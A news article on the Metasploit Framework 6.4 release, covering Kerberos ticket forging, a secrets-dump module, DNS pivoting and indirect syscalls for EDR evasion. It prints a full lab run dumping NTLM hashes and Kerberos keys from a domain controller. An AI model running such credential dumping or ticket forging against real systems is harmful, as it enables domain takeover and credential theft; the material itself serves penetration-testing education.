Metasploit Framework 6.4 Released: What’s New

The latest release from Metasploit, Framework 6.4, is a testament to this ongoing battle. It brings a host of new features and improvements to the forefront of cybersecurity.

It has been a little over a year since Metasploit released version 6.3, and the team at Rapid7 has not been idle.

The new 6.4 version of the Metasploit Framework introduces significant enhancements and new capabilities, building on the solid foundation of its predecessor.

This release underscores Metasploit’s commitment to providing cutting-edge tools for penetration testers and cybersecurity professionals.

Kerberos Improvements

One of the highlights of this release is the substantial improvements made to Kerberos authentication support.

Building on the initial support introduced in version 6.3, Metasploit 6.4 adds new capabilities, including support for the diamond and sapphire techniques alongside the original golden and silver techniques.

Document

Free Webinar : Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

The problem of vulnerability fatigue today
Difference between CVSS-specific vulnerability vs risk-based vulnerability
Evaluating vulnerabilities based on the business impact/risk
Automation to reduce alert fatigue and enhance security posture significantly

AcuRisQ, that helps you to quantify risk accurately:

This update ensures compatibility with Windows Server 2022, keeping pace with the latest Windows targets.

Metasploit has recently announced the launch of Metasploit Framework 6.4, according to a recent article by Rapid7.

Furthermore, Metasploit 6.4 introduces a new module that allows users to dump Kerberos tickets from a compromised host, similar to the functionality offered by the popular Rubeus tool.

This enhancement is beneficial for exploiting instances of Unconstrained Delegation, further expanding the toolkit available to cybersecurity professionals.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN

[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response

[*] 192.168.123.133:445 - Opening Service Control Manager

…

[*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response

[*] 192.168.123.133:445 - Bound to DRSR

[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local

# SID's:

Administrator: S-1-5-21-1242350107-3695253863-3717863007-500

…

# NTLM hashes:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::

…

# Full pwdump format:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::

…

# Kerberos keys:

Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6

…

[*] 192.168.123.133:445 - Cleaning up...

[*] Auxiliary module execution completed

Raj Samani, a Chief Scientist at Rapid7, recently tweeted expressing gratitude towards the Metasploit team and community for their exceptional work in successfully releasing version 6.4 of the Metasploit Framework.

DNS Configuration and New Session Types

Another significant improvement is the enhanced handling of DNS queries within the Metasploit framework.

This update allows users to configure how hostnames should be resolved, which is especially useful in pivoting scenarios.

This ensures that DNS queries for internal resources originate from a compromised host rather than the user’s system, enhancing operational security.

Metasploit 6.4 also introduces new PostgreSQL, MSSQL, MySQL, and SMB session types. These session types allow for interactive queries with remote database instances and direct interaction with SMB shares, including file upload and download capabilities.

This addition streamlines running multiple modules against a single session, improving efficiency and effectiveness.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1

dns add --rule honeypot.lab.lan --index 2 black-hole

dns add-static example2.lab.lan 192.0.2.201

dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:


msf6 > dns print

Default search domain: N/A

Default search list:

  * tor.example.com

  * localdomain

Current cache size:    0

Resolver rule entries

=====================

   #  Rule              Resolver    Comm channel

   -  ----              --------    ------------

   1  *.lab.lan         192.0.2.1   Session 1

   2  honeypot.lab.lan  black-hole  N/A

   3  *

   .    _              static      N/A

   .    _              10.4.5.45

   .    _              10.3.20.98

Static hostnames

================

   Hostname          IPv4 Address  IPv6 Address

   --------          ------------  ------------

   example.lab.lan   192.0.2.200

   example2.lab.lan  192.0.2.201

Indirect Syscalls Support and Discoverability Improvements

Metasploit 6.4 supports indirect syscalls, a technique often used by security software to bypass EDR/AV detection and evade dynamic analysis.

This update focuses on substituting Win32 API calls with indirect syscalls to their corresponding native APIs, enhancing the stealthiness of operations conducted with Metasploit.

To aid users in navigating the vast array of modules available within the framework, Metasploit 6.4 introduces improvements to module discoverability.

The new Hierarchical Search feature matches additional fields within modules, making it easier for users to find the tools they need for their tasks.

As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden it because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules

================

   #  Name                                                 Disclosure Date  Rank    Check  Description

   -  ----                                                 ---------------  ----    -----  -----------

   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging

   1    _ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket

   2    _ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket

   3    _ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket

   4    _ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket

   5    _ AKA: Ticketer                                   .                .       .      .

   6    _ AKA: Klist                                      .                .       .      .

   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

Interact with a module by name or index. 

For example, info 7, use 7 or use auxiliary/admin/Kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

The release of Metasploit Framework 6.4 marks another milestone in developing one of the most widely used penetration testing tools.

With its new features and improvements, Metasploit continues to arm cybersecurity professionals with the tools they need to protect against the ever-evolving threats in the digital world.

As cyber threats grow in complexity, tools like Metasploit Framework 6.4 are essential for maintaining the security of digital infrastructures worldwide.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Read the full article here